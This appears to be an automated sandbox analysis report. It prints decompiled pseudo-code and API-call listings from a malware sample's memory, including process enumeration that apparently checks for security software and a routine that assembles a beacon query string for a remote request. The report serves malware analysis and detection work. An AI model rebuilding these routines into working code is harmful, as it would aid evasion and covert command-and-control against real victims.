                                                                                                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                          				if(_t17 != 0) {
                                                                                                                          					_t8 = Process32First(_t17,  &_v300);
                                                                                                                          					while(_t8 != 0) {
                                                                                                                          						_t9 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          						_t2 = _t9 + 0x4cdee3c; // 0x73617661
                                                                                                                          						_push( &_v264);
                                                                                                                          						if( *0x4cdd110() != 0) {
                                                                                                                          							_t15 = 1;
                                                                                                                          						} else {
                                                                                                                          							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						L7:
                                                                                                                          						CloseHandle(_t17);
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					goto L7;
                                                                                                                          				}
                                                                                                                          				L8:
                                                                                                                          				return _t15;
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04CD4A13
                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 04CD4A26
                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 04CD4A52
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 04CD4A61
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 420147892-0
                                                                                                                          • Opcode ID: 6f002ce38a442e17b2502b0e8b1ddec990adf4524608a9650e2461d6c264862c
                                                                                                                          • Instruction ID: df9465f1adbec8216795f32f70d49763e3bd31f1e2255592fc3cc052f9619426
                                                                                                                          • Opcode Fuzzy Hash: 6f002ce38a442e17b2502b0e8b1ddec990adf4524608a9650e2461d6c264862c
                                                                                                                          • Instruction Fuzzy Hash: B0F0BB356011246BD720AB669C49EEB76ADDBC5714F040172E75AD3000FA34FE45C7A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E306CB6
                                                                                                                          • collate.LIBCPMT ref: 6E306CBF
                                                                                                                            • Part of subcall function 6E3059D8: __EH_prolog3_GS.LIBCMT ref: 6E3059DF
                                                                                                                            • Part of subcall function 6E3059D8: __Getcoll.LIBCPMT ref: 6E305A43
                                                                                                                            • Part of subcall function 6E3059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E305A5F
                                                                                                                          • __Getcoll.LIBCPMT ref: 6E306D05
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D19
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D2E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D7F
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EB4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EC7
                                                                                                                          • int.LIBCPMT ref: 6E306ED4
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306EE4
                                                                                                                          • int.LIBCPMT ref: 6E306EF1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F01
                                                                                                                          • int.LIBCPMT ref: 6E306F0E
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F1E
                                                                                                                          • int.LIBCPMT ref: 6E306CDF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • int.LIBCPMT ref: 6E306D42
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306D6C
                                                                                                                          • int.LIBCPMT ref: 6E306D97
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DC5
                                                                                                                          • int.LIBCPMT ref: 6E306DD2
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306DF9
                                                                                                                          • int.LIBCPMT ref: 6E306E06
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306E56
                                                                                                                          • int.LIBCPMT ref: 6E306E63
                                                                                                                          • int.LIBCPMT ref: 6E306F36
                                                                                                                          • numpunct.LIBCPMT ref: 6E306F5D
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306F6D
                                                                                                                          • int.LIBCPMT ref: 6E306F7A
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FB1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FC4
                                                                                                                          • int.LIBCPMT ref: 6E306FD1
                                                                                                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E306FE1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                          • String ID: 8=An$<=An$@=An$D=An$D=An$H=An$H=An$L=An$L=An$P=An$T=An$T=An
                                                                                                                          • API String ID: 2009638416-1366981069
                                                                                                                          • Opcode ID: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction ID: 22c100071f38c969e5c3fd6360353a9a77e72891a3ceea694c84d21490914707
                                                                                                                          • Opcode Fuzzy Hash: 68a267592dcc7161e0af48a73dc9e59024d0fa4568c9996fda4162abbeb6e472
                                                                                                                          • Instruction Fuzzy Hash: C791F6B1D04319AFEB215FF5CC54BBFBAADAF52754F00481DE844AB280EB758941C7A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E04CD6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                          				void* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				void* _v16;
                                                                                                                          				void* _v20;
                                                                                                                          				void* _v24;
                                                                                                                          				void* _v28;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				long _t59;
                                                                                                                          				intOrPtr _t60;
                                                                                                                          				intOrPtr _t61;
                                                                                                                          				intOrPtr _t62;
                                                                                                                          				intOrPtr _t63;
                                                                                                                          				intOrPtr _t64;
                                                                                                                          				void* _t67;
                                                                                                                          				intOrPtr _t68;
                                                                                                                          				int _t71;
                                                                                                                          				void* _t72;
                                                                                                                          				void* _t73;
                                                                                                                          				void* _t75;
                                                                                                                          				void* _t78;
                                                                                                                          				intOrPtr _t82;
                                                                                                                          				intOrPtr _t86;
                                                                                                                          				intOrPtr* _t88;
                                                                                                                          				void* _t94;
                                                                                                                          				intOrPtr _t100;
                                                                                                                          				signed int _t104;
                                                                                                                          				char** _t106;
                                                                                                                          				int _t109;
                                                                                                                          				intOrPtr* _t112;
                                                                                                                          				intOrPtr* _t114;
                                                                                                                          				intOrPtr* _t116;
                                                                                                                          				intOrPtr* _t118;
                                                                                                                          				intOrPtr _t121;
                                                                                                                          				intOrPtr _t126;
                                                                                                                          				int _t130;
                                                                                                                          				CHAR* _t132;
                                                                                                                          				intOrPtr _t133;
                                                                                                                          				void* _t134;
                                                                                                                          				void* _t143;
                                                                                                                          				int _t144;
                                                                                                                          				void* _t145;
                                                                                                                          				intOrPtr _t146;
                                                                                                                          				void* _t148;
                                                                                                                          				long _t152;
                                                                                                                          				intOrPtr* _t153;
                                                                                                                          				intOrPtr* _t154;
                                                                                                                          				intOrPtr* _t157;
                                                                                                                          				void* _t158;
                                                                                                                          				void* _t160;
                                                                                                                          
                                                                                                                          				_t143 = __edx;
                                                                                                                          				_t134 = __ecx;
                                                                                                                          				_t59 = __eax;
                                                                                                                          				_v12 = 8;
                                                                                                                          				if(__eax == 0) {
                                                                                                                          					_t59 = GetTickCount();
                                                                                                                          				}
                                                                                                                          				_t60 =  *0x4cdd018; // 0x14d7c998
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t61 =  *0x4cdd014; // 0x3a87c8cd
                                                                                                                          				_t132 = _a16;
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t62 =  *0x4cdd010; // 0xd8d2f808
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t63 =  *0x4cdd00c; // 0x81762942
                                                                                                                          				asm("bswap eax");
                                                                                                                          				_t64 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t3 = _t64 + 0x4cde633; // 0x74666f73
                                                                                                                          				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x4cdd02c,  *0x4cdd004, _t59);
                                                                                                                          				_t67 = E04CD5B60();
                                                                                                                          				_t68 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          				_t4 = _t68 + 0x4cde673; // 0x74707526
                                                                                                                          				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                          				_t160 = _t158 + 0x38;
                                                                                                                          				_t145 = _t144 + _t71;
                                                                                                                          				_t72 = E04CD1BBF(_t134);
                                                                                                                          				_t133 = __imp__;
                                                                                                                          				_v8 = _t72;
                                                                                                                          				if(_t72 != 0) {
                                                                                                                          					_t126 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t7 = _t126 + 0x4cde8cc; // 0x736e6426
                                                                                                                          					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                          					_t160 = _t160 + 0xc;
                                                                                                                          					_t145 = _t145 + _t130;
                                                                                                                          					HeapFree( *0x4cdd270, 0, _v8);
                                                                                                                          				}
                                                                                                                          				_t73 = E04CD137A();
                                                                                                                          				_v8 = _t73;
                                                                                                                          				if(_t73 != 0) {
                                                                                                                          					_t121 =  *0x4cdd2e0; // 0xbda5a8
                                                                                                                          					_t11 = _t121 + 0x4cde8d4; // 0x6f687726
                                                                                                                          					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                          					_t160 = _t160 + 0xc;
                                                                                                                          					HeapFree( *0x4cdd270, 0, _v8);
                                                                                                                          				}
                                                                                                                          				_t146 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          				_t75 = E04CD3857(0x4cdd00a, _t146 + 4);
                                                                                                                          				_t152 = 0;
                                                                                                                          				_v20 = _t75;
                                                                                                                          				if(_t75 == 0) {
                                                                                                                          					L26:
                                                                                                                          					HeapFree( *0x4cdd270, _t152, _a16);
                                                                                                                          					return _v12;
                                                                                                                          				} else {
                                                                                                                          					_t78 = RtlAllocateHeap( *0x4cdd270, 0, 0x800);
                                                                                                                          					_v8 = _t78;
                                                                                                                          					if(_t78 == 0) {
                                                                                                                          						L25:
                                                                                                                          						HeapFree( *0x4cdd270, _t152, _v20);
                                                                                                                          						goto L26;
                                                                                                                          					}
                                                                                                                          					E04CDA811(GetTickCount());
                                                                                                                          					_t82 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          					__imp__(_t82 + 0x40);
                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                          					_t86 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          					__imp__(_t86 + 0x40);
                                                                                                                          					_t88 =  *0x4cdd364; // 0x58b95b0
                                                                                                                          					_t148 = E04CD1974(1, _t143, _a16,  *_t88);
                                                                                                                          					_v28 = _t148;
                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                          					if(_t148 == 0) {
                                                                                                                          						L24:
                                                                                                                          						HeapFree( *0x4cdd270, _t152, _v8);
                                                                                                                          						goto L25;
                                                                                                                          					}
                                                                                                                          					StrTrimA(_t148, 0x4cdc2ac);
                                                                                                                          					_push(_t148);
                                                                                                                          					_t94 = E04CD38CA();
                                                                                                                          					_v16 = _t94;
                                                                                                                          					if(_t94 == 0) {
                                                                                                                          						L23:
                                                                                                                          						HeapFree( *0x4cdd270, _t152, _t148);
                                                                                                                          						goto L24;
                                                                                                                          					}
                                                                                                                          					_t153 = __imp__;
                                                                                                                          					 *_t153(_t148, _a4);
                                                                                                                          					 *_t153(_v8, _v20);
                                                                                                                          					_t154 = __imp__;
                                                                                                                          					 *_t154(_v8, _v16);
                                                                                                                          					_t100 = E04CD1922( *_t154(_v8, _t148), _v8);
                                                                                                                          					_a4 = _t100;
                                                                                                                          					if(_t100 == 0) {
                                                                                                                          						_v12 = 8;
                                                                                                                          						L21:
                                                                                                                          						E04CD47D5();
                                                                                                                          						L22:
                                                                                                                          						HeapFree( *0x4cdd270, 0, _v16);
                                                                                                                          						_t152 = 0;
                                                                                                                          						goto L23;
                                                                                                                          					}
                                                                                                                          					_t104 = E04CD365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                          					_v12 = _t104;
                                                                                                                          					if(_t104 == 0) {
                                                                                                                          						_t157 = _v24;
                                                                                                                          						_v12 = E04CD3273(_t157, _a4, _a8, _a12);
                                                                                                                          						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                          						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                          						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                          						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                          						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                          						_t118 =  *_t157;
                                                                                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                          						E04CD4AAB(_t157);
                                                                                                                          					}
                                                                                                                          					if(_v12 != 0x10d2) {
                                                                                                                          						L16:
                                                                                                                          						if(_v12 == 0) {
                                                                                                                          							_t106 = _a8;
                                                                                                                          							if(_t106 != 0) {
                                                                                                                          								_t149 =  *_t106;
                                                                                                                          								_t155 =  *_a12;
                                                                                                                          								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                          								_t109 = E04CD8FB2(_t149, _t149, _t155 >> 1);
                                                                                                                          								_t148 = _v28;
                                                                                                                          								 *_a12 = _t109;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							L19:
                                                                                                                          							E04CD4AAB(_a4);
                                                                                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                          								goto L22;
                                                                                                                          							} else {
                                                                                                                          								goto L21;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_v12 = _v12 & 0x00000000;
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}





















































                                                                                                                          0x04cd6395
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x04cd6395
                                                                                                                          0x04cd6354
                                                                                                                          0x00000000
                                                                                                                          0x04cd6354
                                                                                                                          0x04cd634c

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD611D
                                                                                                                          • wsprintfA.USER32 ref: 04CD616D
                                                                                                                          • wsprintfA.USER32 ref: 04CD618A
                                                                                                                          • wsprintfA.USER32 ref: 04CD61B6
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD61C8
                                                                                                                          • wsprintfA.USER32 ref: 04CD61E9
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD61F9
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04CD6227
                                                                                                                          • GetTickCount.KERNEL32 ref: 04CD6238
                                                                                                                          • RtlEnterCriticalSection.NTDLL(058B9570), ref: 04CD624C
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(058B9570), ref: 04CD626A
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                            • Part of subcall function 04CD1974: lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD1974: strcpy.NTDLL ref: 04CD19BE
                                                                                                                            • Part of subcall function 04CD1974: lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD1974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                          • StrTrimA.SHLWAPI(00000000,04CDC2AC,?,058B95B0), ref: 04CD62A1
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(058B9B10,00000000,00000000,745EC740,04CD467E,00000000), ref: 04CD38DA
                                                                                                                            • Part of subcall function 04CD38CA: lstrlen.KERNEL32(?), ref: 04CD38E2
                                                                                                                            • Part of subcall function 04CD38CA: lstrcpy.KERNEL32(00000000,058B9B10), ref: 04CD38F6
                                                                                                                            • Part of subcall function 04CD38CA: lstrcat.KERNEL32(00000000,?), ref: 04CD3901
                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04CD62C2
                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 04CD62CA
                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 04CD62D8
                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 04CD62DE
                                                                                                                            • Part of subcall function 04CD1922: lstrlen.KERNEL32(?,00000000,058B9B38,00000000,04CD74FF,058B9D16,?,?,?,?,?,69B25F44,00000005,04CDD00C), ref: 04CD1929
                                                                                                                            • Part of subcall function 04CD1922: mbstowcs.NTDLL ref: 04CD1952
                                                                                                                            • Part of subcall function 04CD1922: memset.NTDLL ref: 04CD1964
                                                                                                                          • wcstombs.NTDLL ref: 04CD636F
                                                                                                                            • Part of subcall function 04CD3273: SysAllocString.OLEAUT32(?), ref: 04CD32AE
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04CD63B0
                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04CD63BC
                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,058B95B0), ref: 04CD63C8
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD63D4
                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 04CD63E0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748877296-0
                                                                                                                          • Opcode ID: 8a767b6b2ad4ce3e29a34f8fcb5e5bd74bca93fb8801a5a432e48474f58fd5d7
                                                                                                                          • Instruction ID: c7db18a1215b91f58e1e116cbae5a1fb566bb2121b54a8ce346287cb8e47b921
                                                                                                                          • Opcode Fuzzy Hash: 8a767b6b2ad4ce3e29a34f8fcb5e5bd74bca93fb8801a5a432e48474f58fd5d7
                                                                                                                          • Instruction Fuzzy Hash: 89913875901209AFDB11AFA8DC88BAE7BBAFF48314F144025FA06D7250DB35ED11DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 6E33B2E8
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA15
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA27
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA39
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA4B
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA5D
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA6F
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA81
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CA93
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAA5
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAB7
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAC9
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CADB
                                                                                                                            • Part of subcall function 6E33C9F8: _free.LIBCMT ref: 6E33CAED
                                                                                                                          • _free.LIBCMT ref: 6E33B2DD
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33B2FF
                                                                                                                          • _free.LIBCMT ref: 6E33B314
                                                                                                                          • _free.LIBCMT ref: 6E33B31F
                                                                                                                          • _free.LIBCMT ref: 6E33B341
                                                                                                                          • _free.LIBCMT ref: 6E33B354
                                                                                                                          • _free.LIBCMT ref: 6E33B362
                                                                                                                          • _free.LIBCMT ref: 6E33B36D
                                                                                                                          • _free.LIBCMT ref: 6E33B3A5
                                                                                                                          • _free.LIBCMT ref: 6E33B3AC
                                                                                                                          • _free.LIBCMT ref: 6E33B3C9
                                                                                                                          • _free.LIBCMT ref: 6E33B3E1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 161543041-0
                                                                                                                          • Opcode ID: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction ID: 643d77b938cb2e80e64f6ad0a7dcce358491d49f49f3c06f0594ae71bd86d903
                                                                                                                          • Opcode Fuzzy Hash: 9f595cf4663ba49c3c27c2617a72f93137eff1310d12a0bfc860585168004362
                                                                                                                          • Instruction Fuzzy Hash: D8314E31604AA19FEB519BB9E840FDAB3F8AF00364FB44819E094DA159DF31ED54CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305688
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305692
                                                                                                                          • int.LIBCPMT ref: 6E3056A9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3056E3
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305703
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305710
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30571D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: T=An
                                                                                                                          • API String ID: 3920336645-183501617
                                                                                                                          • Opcode ID: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction ID: b88e0c7fdfb887db62a379d231eeeb2d20fc69b82dc71074db70c368b6d25c31
                                                                                                                          • Opcode Fuzzy Hash: af97d9ee79a885e37b4d51e80876e17d01ba37c3b4bf55f91fbbdbc7e59dc5a9
                                                                                                                          • Instruction Fuzzy Hash: E721F37590061DDBCF02DFE4D9047EEBBBABF45718F504909E8506B280CB709941DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7DA6
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7DB0
                                                                                                                          • int.LIBCPMT ref: 6E2F7DC7
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7E01
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7E21
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7E2E
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7E3B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                          • String ID: x<An
                                                                                                                          • API String ID: 3920336645-3788929408
                                                                                                                          • Opcode ID: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction ID: e4c38b555e5148da7ca9bee51b1657c5267a73514a24089315a02dc41184577e
                                                                                                                          • Opcode Fuzzy Hash: f6a17c18c7609e60e5b72a0950a2e08927fa5b03e2f03755c507ef8d172143e7
                                                                                                                          • Instruction Fuzzy Hash: 2421D47994011EDBCF01DFE4D911AEEBBBAAF45714F10490AE8506B280DB709D02CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3054C9
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3054D3
                                                                                                                          • int.LIBCPMT ref: 6E3054EA
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E30550D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305524
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305544
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305551
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID: L=An
                                                                                                                          • API String ID: 3376033448-2673704001
                                                                                                                          • Opcode ID: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction ID: c934ce03d4ed54ef24108c2da636eeeb9f0121477426b7f36b26a66e0f761f1f
                                                                                                                          • Opcode Fuzzy Hash: 18e0cfcd1be408711dd7825c5c79e21c7cb9c301a716e3af838d2f8a63873de7
                                                                                                                          • Instruction Fuzzy Hash: AB01C07A900519EBCF11DBE8C954AFEB7BBAF45318F150809D8226B280DF70DA46CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30555E
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305568
                                                                                                                          • int.LIBCPMT ref: 6E30557F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
